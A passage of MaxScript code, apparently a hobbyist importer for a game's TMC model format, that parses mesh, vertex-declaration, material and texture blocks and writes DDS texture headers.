0x80000001: #MdlGeo		-- Mesh Info
0x80000002: #TTX			-- Texture Info (XPR2 Header)
0x80000003: #VtxLay		-- Vertex Buffer Info
0x80000004: #IdxLay			-- Index Buffer Info
0x80000005: #MtrCol			-- Material Colours?
0x80000006: #MdlInfo		-- 
0x80000010: #HieLay			-- Bone Hierarchy
0x80000020: #LHeader		-- L File Header
0x80000030: #NodeLay		-- Bone Names
0x80000040: #GlblMtx		-- 
0x80000050: #BnOfsMtx	-- 
0x80000060: #cpf				-- 
0x80000070: #MCAPACK	-- 
0x80000080: #RENPACK	-- 
0x00000001: #GEOXTRAS	-- 
0x00000002: #ACSCLS		-- ACSCLS, render and hide flags?
default: #UNKNOWN
)
)

fn Get_D3DDECLUSAGE id= (
case id of (
--Position data
0x00: #POSITION

--Blending weight data
0x01: #BLENDWEIGHT

--Blending indices data
0x02: #BLENDINDICES

--Vertex normal data
0x03: #NORMAL

--Point size data
0x04: #PSIZE

--Texture coordinate data
0x05: #TEXCOORD

--Vertex tangent data.
0x06: #TANGENT

--Vertex binormal data.
0x07: #BINORMAL

--Tessellation factor (Single positive floating point value)
0x08: #TESSFACTOR

--Vertex data contains transformed position data
0x09: #POSITIONT

--Vertex data contains diffuse or specular color
0x0A: #COLOUR

--Vertex data contains fog data
0x0B: #FOG

--Vertex data contains depth data.
0x0C: #DEPTH

--Vertex data contains sampler data
0x0D: #SAMPLE
default: #UNKNOWN
)
)


fn Get_D3DDECLTYPE id= (
case id of (
0x00: #FLOAT1
0x01: #FLOAT2
0x02: #FLOAT3
0x03: #FLOAT4
0x04: #INT1
0x05: #INT2
0x06: #INT4
0x07: #UINT1
0x08: #UINT2
0x09: #UINT4
0x0A: #UINT1N
0x0B: #UINT2N
0x0C: #UINT4N
0x0D: #D3DCOLOR
0x0E: #UBYTE4
0x0F: #UINT4N
0x10: #D3DCOLOR
0x11: #UBYTE4
0x12: #BYTE4
0x13: #UBYTE4N
0x14: #BYTE4N
0x15: #SHORT2
0x16: #SHORT4
0x17: #USHORT2
0x18: #USHORT4
0x19: #SHORT2N
0x1A: #SHORT4N
0x1B: #USHORT2N
0x1C: #USHORT4N
0x1D: #UDEC3
0x1E: #DEC3
0x1F: #UDEC3N
0x20: #DEC3N
0x21: #UDEC4
0x22: #DEC4
0x23: #UDEC4N
0x24: #DEC4N
0x25: #UHEND3
0x26: #HEND3
0x27: #UHEND3N
0x28: #HEND3N
0x29: #UDHEN3
0x2A: #DHEN3
0x2B: #UDHEN3N
0x2C: #DDECLTYPE_DHEN3N
0x2D: #FLOAT16_2
0x2E: #FLOAT16_4
0x2F: #UNUSED
default: #UNKNOWN
)
)



xpr2entry =  (xpr2_entry magic:#() offset:#() size:#() string_offset:#() string:#())
tx2dentry = (tx2d_entry ukn01:#() ukn02:#() ukn03:#() ukn04:#() ukn05:#() \
ukn06:#() ukn07:#() ukn08:#() ukn09:#() ukn10:#() ukn11:#() ukn12:#() \
ukn13:#() ukn14:#() ukn15:#() ukn16:#() ukn17:#() ukn18:#() ukn19:#())

boneArray = (bone_data obj:#() name:#() matrix:#() parent:#() children:#())
tmclBuffer = (LHeader offset:#() size:#())
objArray = (ObjGeo name:#() GeoDecl:#() modeldata:#())
VtxLayArray = (VtxLay offset:#())
IdxLayArray = (IdxLay offset:#())
MCAPARAMARRAY = (MCAPARAM ukn1:#())

fn readBElong fstream = (bit.swapBytes (bit.swapBytes (readlong fstream #unsigned) 1 4) 2 3)
fn readBEshort fstream = (bit.swapBytes (readshort fstream #unsigned) 1 2)
fn readBEtriplet fstream = (((readbyte f #unsigned)*0x00010000)+((readbyte f #unsigned)*0x00000100)+((readbyte f #unsigned)*0x00000001))
fn ReadBE_HEND3N fstream = (
nz=(bit.swapBytes (readshort fstream #unsigned) 1 2)
fseek fstream -1 #seek_cur
ny=(bit.swapBytes (readshort fstream #unsigned) 1 2)
fseek fstream -1 #seek_cur
nx=(bit.swapBytes (readshort fstream #unsigned) 1 2)

-- [11,11,10] Signed
nx=bit.shift nx -5
ny=bit.shift (bit.set (bit.set ny 15 false) 16 false) -3
nz=bit.set (bit.set (bit.set (bit.set (bit.set nz 12 false) 13 false) 14 false) 15 false) 16 false

if nx>=1023 do nx-=2048
if ny>=1023 do ny-=2048
if nz>=511 do nz-=1024
nx=nx/1023.0
ny=ny/1023.0
nz=nz/511.0
return (normalize [nx,-nz,ny])
)
fn ReadBEfloat fstream = (
bit.intAsFloat (bit.swapBytes (bit.swapBytes (readlong fstream #unsigned) 1 4) 2 3)
)
fn readBEHalfFloat fstream = (
hf=bit.swapBytes (readshort fstream #unsigned) 1 2
sign = bit.get hf 16
exponent = (bit.shift (bit.and hf (bit.hexasint "7C00")) -10) as integer - 16
fraction = bit.and hf (bit.hexasint "03FF")
if sign==true then sign = 1 else sign = 0
exponentF = exponent + 127
outputAsFloat = bit.or (bit.or (bit.shift fraction 13) \
(bit.shift exponentF 23)) (bit.shift sign 31)
return bit.intasfloat outputasfloat*2)
fn readcol fstream = (
color ((readBEfloat fstream)*255) \
((readBEfloat fstream)*255) \
((readBEfloat fstream)*255) \
((readBEfloat fstream)*255)
)
fn writeBEshort fstream num = (
writeshort fstream (bit.swapBytes num 1 2) #unsigned)
fn writeBEtriplet fstream num = (
v1=num/0x01
v2=num/0x0100
v3=num/0x010000
v4=num/0x01000000
-- writebyte fstream (v4) #unsigned
writebyte fstream (v3-(v4*0x100)) #unsigned
writebyte fstream (v2-(v3*0x100)) #unsigned
writebyte fstream (v1-(v2*0x100)) #unsigned
)
fn writeBElong fstream num = (
writelong fstream (bit.swapBytes (bit.swapBytes (num) 1 4) 2 3) #unsigned)
fn ReadFixedString bstream fixedLen = (
local str = ""
for i = 1 to fixedLen do (
str += bit.intAsChar (ReadByte bstream #unsigned))
str
)
fn getpadding num alignment = ((mod (alignment-(mod num alignment)) alignment))
fn paddstring len instring = (
instring=instring as string
local str="";if instring.count <=len then(
for i = 1 to (len-instring.count) do(str+="0")
str = (str+instring))else(
for i = 1 to len do(str+="0";str[i]=instring[i]));str)
fn uppercase instring = (
local upper, lower, outstring
upper="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lower="abcdefghijklmnopqrstuvwxyz"
outstring=copy instring
for i=1 to outstring.count do (
j=findString lower outstring[i]
if (j != undefined) do outstring[i]=upper[j])
outstring)
fn printblockpos bname badr = (
str=((bit.intAsHex badr)as string)
if str[str.count]=="L" do(str = substring str 1 (str.count-1))
format "% @ 0xDD%\n" bname (paddstring 6 (uppercase str))
)
fn decodedimension long = (
texW=0
texH=0
texD=0
texV=0

for i = 1 to 12 do (
texW = bit.set texW i (bit.get long i)
)
texW+=1

for i = 14 to 26 do (
texH = bit.set texH (i-13) (bit.get long i)
)
texH+=1

for i = 27 to 32 do (
texD = bit.set texD (i-26) (bit.get long i)
)
texD+=1

IF ((bit.get (texW-1) 12)==true) \
AND ((bit.get (texH-1) 10)==true)
THEN (
texV=1
texW=(1+(bit.set (texW-1) 12 false))
texH=(1+(bit.set (texH-1) 10 false))*4
-- format "image: % x % x % *Morphable\n"texW texH texD
)
ELSE (
-- format "image: % x % x %\n"texW texH texD
)
return [texW,texH,texD,texV]
)
fn writeDDSheader fstream texW texH texM texC = (
texP=0
writelong fstream 0x20534444 #unsigned -- File ID
writelong fstream 0x7C #unsigned -- Header Size
case of( -- dwFlags
(texC=="DXT1"): (writelong fstream 0x00081007 #unsigned;texP=((texW*texH)/0x02))
(texC=="DXT3"): (writelong fstream 0x00081007 #unsigned;texP=(texW*texH))
(texC=="DXT5"): (writelong fstream 0x00081007 #unsigned;texP=(texW*texH))
(texC=="ATI1"): (writelong fstream 0x000A1007 #unsigned;texP=((texW*texH)/0x20))
(texC=="ATI2"): (writelong fstream 0x000A1007 #unsigned;texP=(texW*texH))
(texC=="P8"): (writelong fstream 0x000A1007 #unsigned;texP=((texW*texH)/0x02))
(texC=="ARGB16"): (writelong fstream 0x00081007 #unsigned;texP=(((texW*texH)/0x8)*0x10))
(texC=="ARBG32"): (writelong fstream 0x00081007 #unsigned;texP=(((texW*texH)/0x4)*0x10)))
writelong fstream texW #unsigned -- Texture Width
writelong fstream texH #unsigned -- Texture Height
writelong fstream texP #unsigned -- Pitch (#of bytes in a single row across the texture)
writelong fstream 0x00 #unsigned -- Image Depth? Not Used, for Image Volume
writelong fstream texM #unsigned -- Texture MIP Count
for i = 1 to 11 do writelong fstream 0x00 #unsigned -- Reserved Space
writelong fstream 0x20 #unsigned -- Size of PIXEL_FORMAT info, always 32bytes;
case of(
(texC=="DXT1"): (writelong fstream 0x04;writelong fstream 0x31545844 #unsigned
writelong s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writelong fstream 0x00001000 #unsigned)
(texC=="DXT3"): (writelong fstream 0x04;writelong fstream 0x33545844 #unsigned
writelong s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte s 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writelong fstream 0x00001000 #unsigned)
(texC=="DXT5"): (writelong fstream 0x04;writelong fstream 0x35545844 #unsigned
writelong fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writelong fstream 0x00001000 #unsigned)
(texC=="ATI1"): (writelong fstream 0x04;writelong fstream 0x31495441 #unsigned
writelong fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writelong fstream 0x00401008 #unsigned)
(texC=="ATI2"): (writelong fstream 0x04;writelong fstream 0x32495441 #unsigned
writelong fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writelong fstream 0x00401008 #unsigned)
(texC=="P8"): (writelong fstream 0x20;writelong fstream 0x20203850 #unsigned
writelong fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writelong fstream 0x00401008 #unsigned)
(texC=="ARGB16"): (writelong fstream 0x41;writelong fstream 0x00000000 #unsigned
writelong fstream 0x10;writebyte fstream 0x00;writebyte fstream 0x0F;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0xF0;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x0F;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0xF0;writebyte fstream 0x00
writebyte fstream 0x00;writelong fstream 0x00001000 #unsigned)
(texC=="ARBG32"): (writelong fstream 0x41;writelong fstream 0x00000000 #unsigned
writelong fstream 0x20;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0xFF
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0xFF;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0xFF;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00;writebyte fstream 0x00
writebyte fstream 0xFF;writelong fstream 0x00001000 #unsigned))
for i = 1 to 4 do writelong fstream 0x00 #unsigned) -- Reserved Space for CAPS

fn readtag fstream = (
local tempArray = (entry tag:#() flags:#() size:#() adr:#() data:#() offsets:#() sizes:#() children:#())
block_address = ftell fstream
block_magic = ReadFixedString fstream 8
block_flags = [(readbyte fstream),(readbyte fstream),(readbyte fstream),(readbyte fstream)]
if block_flags[1]==-1 then(
block_header_size = readBElong fstream
block_size = readBElong fstream
child_count = readBElong fstream
child_count2 = readBElong fstream
ukn01 = readBElong fstream -- padding?
child_offset = readBElong fstream -- offsets
child_offset2 = readBElong fstream -- sizes?
ukn03 = readBElong fstream -- if an address is present a small index table follows
ukn04 = readBElong fstream -- padding?
data_start = ftell fstream

if data_start!=child_offset then( -- I think this is specific user data. so the struct is different depending on which block
-- format "Props @ 0x%\n" ((bit.intAsHex(ftell fstream))as string)
-- blc_mem_type = readBEshort fstream
-- blc_mem_flag = readBEshort fstream
-- blc_mem_adr = readBElong fstream
-- blc_mem_ukn01 = readBElong fstream -- padding?
-- blc_mem_idx_cnt = readBElong fstream -- padding?
-- for mem = 1 to blc_mem_idx_cnt do (
-- blc_mem_idx = (readBEshort fstream) + 1
-- );fseek fstream (getpadding (ftell fstream) 16) #seek_cur
-- blc_mem_id = readBElong fstream
-- blc_mem_offset = readBElong fstream
-- blc_mem_size = readBElong fstream
-- blc_mem_ukn02 = readBElong fstream -- padding?
append tempArray.data [data_start,(ftell fstream)] -- log area, encase its needed, and I've parsed it wrong
)else(append tempArray.data [0,0])
if child_offset != 0 do (
fseek fstream (child_offset+block_address) #seek_set
for x = 1 to child_count do (
child_offset = readBElong fstream
-- if child_offset!=0 do (child_offset+=block_start)
append tempArray.offsets child_offset
)
)
if child_offset2 != 0 do (
fseek fstream (child_offset2+block_address) #seek_set
for x = 1 to child_count2 do (
child_offset = readBElong fstream
-- if child_offset!=0 do (child_offset+=block_start)
append tempArray.sizes child_offset
)
)
)else(
block_size = 0
block_flags = [0,0,0,0]
)
append tempArray.tag block_magic
append tempArray.flags block_flags
append tempArray.size block_size
append tempArray.adr block_address
return tempArray
)
fn loopchildren active_node fstream = (
active_node.children = #()
num_children = active_node.offsets.count
for m = 1 to num_children do (
if active_node.offsets[m]!=0 do(
fseek fstream (active_node.offsets[m]+active_node.adr[1]) #seek_set
append active_node.children (readtag fstream)))
return active_node
)





append dataArray (readtag f)
case of (
(dataArray[1].tag[1]=="TMC"): (
fseek f (dataArray[1].adr[1]+0x50) #seek_set
	
	
tmc_name = readstring f
fseek f (getpadding (ftell f) 16) #seek_cur


tmc_ukn01_01 = readBEfloat f -- B1
tmc_ukn01_02 = readBEfloat f
tmc_ukn01_03 = readBEfloat f
tmc_ukn01_04 = readBEfloat f
	
tmc_ukn01_05 = readBEfloat f -- B2
tmc_ukn01_06 = readBEfloat f
tmc_ukn01_07 = readBEfloat f
tmc_ukn01_08 = readBEfloat f
	
tmc_ukn01_09 = readBEfloat f -- B3
tmc_ukn01_10 = readBEfloat f
tmc_ukn01_11 = readBEfloat f
tmc_ukn01_12 = readBEfloat f

tmc_ukn01_13 = readBEfloat f -- B4
tmc_ukn01_14 = readBEfloat f
tmc_ukn01_15 = readBEfloat f
tmc_ukn01_16 = readBEfloat f

tmc_ukn01_17 = readBEfloat f -- B5 (Z?)
tmc_ukn01_18 = readBEfloat f
tmc_ukn01_19 = readBEfloat f
tmc_ukn01_20 = readBEfloat f

tmc_ukn01_21 = readBEfloat f -- B6 (X?)
tmc_ukn01_22 = readBEfloat f
tmc_ukn01_23 = readBEfloat f
tmc_ukn01_24 = readBEfloat f

tmc_ukn01_25 = readBEfloat f -- B7 (Y?)
tmc_ukn01_26 = readBEfloat f
tmc_ukn01_27 = readBEfloat f
tmc_ukn01_28 = readBEfloat f

tmc_ukn01_29 = readBEfloat f -- B8
tmc_ukn01_30 = readBEfloat f
tmc_ukn01_31 = readBEfloat f
tmc_ukn01_32 = readBEfloat f

if drawp==true do (
bb = dummy ()
bb.boxsize = [(abs(tmc_ukn01_21*2)),(abs (tmc_ukn01_27*2)),(abs(tmc_ukn01_18*2))]*100
	
bb = dummy ();bb.position = [tmc_ukn01_01,-tmc_ukn01_03,tmc_ukn01_02]*100
bb = dummy ();bb.position = [tmc_ukn01_05,-tmc_ukn01_07,tmc_ukn01_06]*100
bb = dummy ();bb.position = [tmc_ukn01_09,-tmc_ukn01_11,tmc_ukn01_10]*100
bb = dummy ();bb.position = [tmc_ukn01_13,-tmc_ukn01_15,tmc_ukn01_14]*100
bb = dummy ();bb.position = [tmc_ukn01_17,-tmc_ukn01_19,tmc_ukn01_18]*100
bb = dummy ();bb.position = [tmc_ukn01_21,-tmc_ukn01_23,tmc_ukn01_22]*100
bb = dummy ();bb.position = [tmc_ukn01_25,-tmc_ukn01_27,tmc_ukn01_26]*100
bb = dummy ();bb.position = [tmc_ukn01_29,-tmc_ukn01_31,tmc_ukn01_30]*100
print tmc_ukn01_21
print tmc_ukn01_22
print tmc_ukn01_23
	
)


loopchildren dataArray[1] f
-- clearlistener()
for x in dataArray[1].children do (
print x.tag[1]
case of (
(x.tag[1]=="MdlGeo"): (  -- describes the vertex and face buffers
loopchildren x f -- collect offsets for ObjGeo Children
format "Number of Objects: %\n" x.offsets.count

for i = 1 to x.offsets.count do( -- "ObjGeo" Number of Sub Objects
format "Object %\n" i
meshArray = (mesh_data subobj_index:#() vertex_start:#() face_start:#() vertex_stride:#() vertex_type:#() vertex_counts:#() face_counts:#())
fseek f x.children[i].data[1][1] #seek_set
fseek f 32 #seek_cur -- skips unknown ints
append objArray.name (readstring f) -- Object Name? but multiple objects are described under it. Sub Mats?
fseek f (getpadding (ftell f) 16) #seek_cur
fseek f (x.children[i].offsets.count*4) #seek_cur  -- they wedge the offset table here O_o ..skipping over
fseek f (getpadding (ftell f) 16) #seek_cur
geodecl_ukn00 = ftell f -- collect block position
geodecl_ukn01 = readFixedString f 8 -- Hello GeoDecl !!
geodecl_ukn02 = readBElong f -- flags
geodecl_ukn03 = readBElong f -- header size
geodecl_ukn04 = readBElong f -- block size
geodecl_ukn05 = readBElong f -- count
geodecl_ukn06 = readBElong f -- count2
geodecl_ukn07 = readBElong f -- reserved space?
geodecl_ukn08 = readBElong f -- offset to table
fseek f ((geodecl_ukn08)+geodecl_ukn00) #seek_set -- seek past header
geodecl_ukn08_array = #()
format "\nObject (%): %\n" i objArray.name[i]
format "\tMaterials: %\n" x.children[i].offsets.count
for y = 1 to geodecl_ukn05 do ( -- loop through the blocks children offsets
geodecl_ukn08_offset = readBElong f
if geodecl_ukn08_offset!=0 do ( -- Collect the children offsets
append geodecl_ukn08_array (geodecl_ukn08_offset+geodecl_ukn00)))


for y = 1 to geodecl_ukn05 do ( -- Multi Data properties, in some relations describe how to read buffer
fseek f geodecl_ukn08_array[y] #seek_set -- set cursor to childs position

format "subobj: %\n" y
geodecl_ukn05_01 = readBElong f -- always 0?
geodecl_ukn05_02 = readBElong f -- header size
geodecl_ukn05_03 = readBElong f -- always 1?
geodecl_ukn05_04 = readBElong f -- chroxx describes as "vert type"
geodecl_ukn05_05 = readBElong f -- chroxx describes as "faceCount"
geodecl_ukn05_06 = readBElong f -- chroxx describes as "vertCount"
geodecl_ukn05_07 = readBElong f -- always 3?
geodecl_ukn05_08 = readBElong f -- always 0?, maybe padding?
geodecl_ukn05_09 = readBElong f -- reserved for memry addressing
geodecl_ukn05_10 = readBElong f -- always 0? padding again?
geodecl_ukn05_11 = readBElong f -- reserved for memry addressing
geodecl_ukn05_12 = readBElong f -- reserved for memry addressing
fseek f (geodecl_ukn08_array[y]+geodecl_ukn05_02) #seek_set	
geodecl_ukn05_13 = readBElong f -- index
-- format "START @ 0x%\n" ((bit.intAsHex(ftell f))as string)
geodecl_ukn05_14 = readBElong f -- stride of vertex entry, chroxx describes as "vSize"
geodecl_ukn05_15 = readBElong f -- elements in vertex definition?, chroxx describes as "fvfCount"
geodecl_ukn05_16 = readBElong f -- reserved memory address
format "fvf count: %\n" geodecl_ukn05_15
for y = 1 to geodecl_ukn05_15 do ( -- chroxx describes as "fvfTable"
geodecl_ukn05_17 = readBElong f  -- ?? index or count, ...it increments
geodecl_ukn05_18 = readBElong f -- appears to be offsets
geodecl_ukn05_19 = readBElong f -- large enough to be offsets, but are mults of 0x1000
format "\t> % % % \n" (paddstring 2 geodecl_ukn05_17) (paddstring 6 (uppercase(bit.intAsHex(geodecl_ukn05_18)))) (paddstring 6 (uppercase(bit.intAsHex(geodecl_ukn05_19))))
	
)
fseek f (getpadding (ftell f) 16) #seek_cur

append meshArray.vertex_type geodecl_ukn05_04
append meshArray.vertex_stride geodecl_ukn05_14

) -- ends loop on GeoDeclar !! too much data lol
geo_ukn05_array = #()
for y = 1 to x.children[i].offsets.count do( -- ObjGeo, SubObject or Material
fseek f (x.children[i].offsets[y]+x.children[i].adr[1]) #seek_set
geo_ukn01 = readBElong f -- index, increments
geo_ukn02 = readBElong f -- ID? 
geo_ukn03 = readBElong f -- Reserved Memory Address
geo_ukn04 = readBElong f -- chroxx describes as "Texture Count"
for z = 1 to geo_ukn04 do ( -- collect sub blocks, texture info
append geo_ukn05_array (readBElong f) -- offset
)
fseek f (getpadding (ftell f) 16) #seek_cur
-- 00 00 00 00 		00 00 00 00  	00 00 00 00 		40 33 43 A0
-- 00 00 00 00 		00 00 00 00  	00 00 00 01 		BD A7 69 30
-- 00 00 00 00 		00 00 00 00  	00 00 00 C0 		00 00 00 00 
-- 00 00 00 00 		00 00 00 00  	BD A7 87 60 		BE 77 3C D0
-- 00 00 00 01 		00 00 00 05  	00 00 00 01 		00 00 00 01
-- 00 00 20 16 		00 00 04 5E  	00 00 11 37 		00 00 02 61
-- 00 00 00 00 		00 00 00 00  	00 00 00 00 		00 00 00 00
-- 00 00 00 00 		00 00 00 00  	3F 80 00 00 		00 00 00 00
-- 3F 80 00 00 		3F 80 00 00  	00 00 00 00 		00 00 00 00
-- 00 00 00 01 		00 00 00 01  	00 00 00 00 		00 00 00 00
-- 00 00 00 00 		00 00 00 00  	24 D0 08 10 		00 00 00 00
geo_ukn06 = readBElong f -- always 0 ?
geo_ukn07 = readBElong f -- always 0 ?
geo_ukn08 = readBElong f -- always 0 ?
geo_ukn09 = readBElong f -- reserved memory space
geo_ukn10 = readBElong f -- always 0 ?
geo_ukn11 = readBElong f -- always 0 ?
geo_ukn12 = readBElong f -- chroxx describes as "meshIndex", 
-- turns out this number links the materials to the object properties. 
-- such as vertex description
geo_ukn13 = readBElong f -- reserved memory space
geo_ukn14 = readBElong f -- 0x00=Transparent | 0x01=Solid
geo_ukn15 = readBElong f -- always 0 ?
geo_ukn16 = readBElong f -- always 192 ?
geo_ukn17 = readBElong f -- always 0 ?
geo_ukn18 = readBElong f -- always 0 ?
geo_ukn19 = readBElong f -- always 0 ?
geo_ukn20 = readBElong f -- reserved memory space
geo_ukn21 = readBElong f -- reserved memory space
geo_ukn22 = readBElong f -- always 1 ?

geo_ukn23 = readBElong f
-- 0x00=RGB is Opacity | 0x01=turns black | 0x02=glows | 0x03=RGBA is opacity | 0x04=RGB inverted, A enabled
-- 0x00=RGB normal, A enabled as oacity | 0xFFFF=Disable Material
geo_ukn24 = readBElong f -- always 1 ?
geo_ukn25 = readBElong f -- 0x00 = ?? | 0x01= ??
geo_ukn26 = readBElong f -- chroxx describes as "FaceStart"
geo_ukn27 = readBElong f -- chroxx describes as "FaceCount"
geo_ukn28 = readBElong f -- chroxx describes as "vertStart"
geo_ukn29 = readBElong f -- chroxx describes as "vertCount"

geo_ukn30 = readBElong f -- always 0 ?
geo_ukn31 = readBElong f -- float?
geo_ukn32 = readBElong f -- float?
geo_ukn33 = readBElong f -- float?
geo_ukn34 = readBElong f -- float?
geo_ukn35 = readBElong f -- float?
geo_ukn36 = readBEfloat f -- float?
geo_ukn37 = readBElong f -- float?
geo_ukn38 = readBEfloat f -- float?
geo_ukn39 = readBEfloat f -- always 0 ?
geo_ukn40 = readBElong f -- always 0 ?
geo_ukn41 = readBElong f -- always 1 ?
geo_ukn42 = readBElong f -- always 1 ?
geo_ukn43 = readBElong f -- always 0 ?
geo_ukn44 = readBElong f -- always 0 ?
geo_ukn45 = readBElong f -- always 0 ?
geo_ukn46 = readBElong f -- always 0 ?
geo_ukn47 = readBElong f -- reserved memory space
geo_ukn48 = readBElong f -- 0x24D80800=?? | 0x14D80800=Reflective?



if printMat != false OR printTex!= False do(

format "\nMaterial(%): % @ 0x%\n" (geo_ukn01+1) (geo_ukn02+1) ((bit.intAsHex(x.children[i].offsets[y]+x.children[i].adr[1]))as string)
printblockpos "RAM" (x.children[i].offsets[y]+x.children[i].adr[1]+0xA76600)
)
if printMat == true do (
format "\tUnknowns;\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% %\n-------------\n" \
geo_ukn06 geo_ukn07 geo_ukn08 geo_ukn10 \
geo_ukn11 geo_ukn14 geo_ukn15 geo_ukn16 \
geo_ukn17 geo_ukn18 geo_ukn19 geo_ukn22 \
geo_ukn23 geo_ukn24 geo_ukn25 geo_ukn30 \
geo_ukn31 geo_ukn32 geo_ukn33 geo_ukn34 \
geo_ukn35 geo_ukn36 geo_ukn37 geo_ukn38 \
geo_ukn39 geo_ukn40 geo_ukn41 geo_ukn42 \
geo_ukn43 geo_ukn44 geo_ukn45 geo_ukn46 \
geo_ukn47 ("0x"+(paddstring 8 (uppercase ((bit.intAsHex(geo_ukn48))as string))))

)

for z = 1 to geo_ukn04 do ( -- Loop Textures for Material, each entry is 112bytes long
fseek f (x.children[i].offsets[y]+x.children[i].adr[1]+geo_ukn05_array[z]) #seek_set

geo_ukn04_01 = readBElong f -- ID, Assigned to each texture, relative to which are loaded into material
geo_ukn04_02 = readBElong f -- 0x00=DiffuseMap | 0x01=NormalMap | 0x02=SpecMap
geo_ukn04_03 = readBElong f -- Index, Which Texture from XPR2 to use
geo_ukn04_04 = readBElong f -- reserved memory space
geo_ukn04_05 = readBElong f -- always 5? is 3 on sweat texture? 
geo_ukn04_06 = readBElong f -- always 1
geo_ukn04_07 = readBElong f -- always 0?
geo_ukn04_08 = readBElong f -- always 0?
geo_ukn04_09 = readBElong f -- always 0?
geo_ukn04_10 = readBElong f -- always 0?
geo_ukn04_11 = readBElong f -- always 0?
geo_ukn04_12 = readBElong f -- always 0?
geo_ukn04_13 = readBElong f -- always 0?
geo_ukn04_14 = readBElong f -- always 0?
geo_ukn04_15 = readBElong f -- always 0?
geo_ukn04_16 = readBElong f -- always 0?
geo_ukn04_17 = readBElong f -- always 1
geo_ukn04_18 = readBElong f -- always 1
geo_ukn04_19 = readBElong f -- always 1
geo_ukn04_20 = readBElong f -- always 0
geo_ukn04_21 = readBElong f -- always 0

geo_ukn04_22 = readBEfloat f -- float?
geo_ukn04_23 = readBEfloat f -- float?
geo_ukn04_24 = readBEfloat f -- float?
geo_ukn04_25 = readBEfloat f -- float?
geo_ukn04_26 = readBEfloat f -- float?
geo_ukn04_27 = readBEfloat f -- float?
geo_ukn04_28 = readBElong f -- always 1

if printTex==true do ( -- mostly all constant :-(
format "\tTexture(%): %\n" geo_ukn04_01 geo_ukn04_03
format "\tUnknowns;\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n\t% % % %\n-------------\n" \
geo_ukn04_02 geo_ukn04_05 geo_ukn04_06 geo_ukn04_07 \
geo_ukn04_08 geo_ukn04_09 geo_ukn04_10 geo_ukn04_10 \
geo_ukn04_11 geo_ukn04_11 geo_ukn04_12 geo_ukn04_13 \
geo_ukn04_14 geo_ukn04_15 geo_ukn04_16 geo_ukn04_17 \
geo_ukn04_18 geo_ukn04_19 geo_ukn04_20 geo_ukn04_21 \
geo_ukn04_21 geo_ukn04_22 geo_ukn04_23 geo_ukn04_24 \
geo_ukn04_25 geo_ukn04_26 geo_ukn04_27 geo_ukn04_28


)

-- 00 00 00 00 00 00 00 00  00 00 00 03 00 00 00 00  00 00 00 05 00 00 00 01  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 01  00 00 00 01 00 00 00 00  00 00 00 00 41 40 00 00  BF 80 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 01
-- 00 00 00 01 00 00 00 01  00 00 00 04 00 00 00 00  00 00 00 05 00 00 00 01  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 01  00 00 00 01 00 00 00 00  00 00 00 00 41 40 00 00  BF 80 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 01
